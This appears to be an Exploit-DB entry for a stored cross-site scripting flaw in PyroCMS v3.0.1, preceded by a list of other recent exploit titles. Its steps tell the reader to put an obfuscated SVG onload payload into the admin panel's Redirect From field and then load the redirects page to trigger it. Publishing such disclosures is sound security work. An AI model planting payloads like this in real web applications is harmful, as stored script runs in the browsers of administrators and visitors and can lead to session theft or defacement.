
10 changes to exploits/shellcodes/ghdb CrushFTP < 11.1.0 - Directory Traversal Apache mod_proxy_cluster - Stored XSS CE Phoenix Version 1.0.8.20 - Stored XSS Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS) Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS) Prison Management System - SQL Injection Authentication Bypass PyroCMS v3.0.1 - Stored XSS Plantronics Hub 3.25.1 - Arbitrary File Read
17 lines
No EOL
601 B
Text
17 lines
No EOL
601 B
Text
# Exploit Title: PyroCMS v3.0.1 - Stored XSS
|
|
# Date: 2023-11-25
|
|
# Exploit Author: tmrswrr
|
|
# Category : Webapps
|
|
# Vendor Homepage: https://pyrocms.com/
|
|
# Version: v3.0.1
|
|
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS
|
|
|
|
|
|
|
|
----------------------------------------------------------------------------------------------------
|
|
|
|
|
|
1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
|
|
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
|
|
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
|
|
4-You will be see alert button |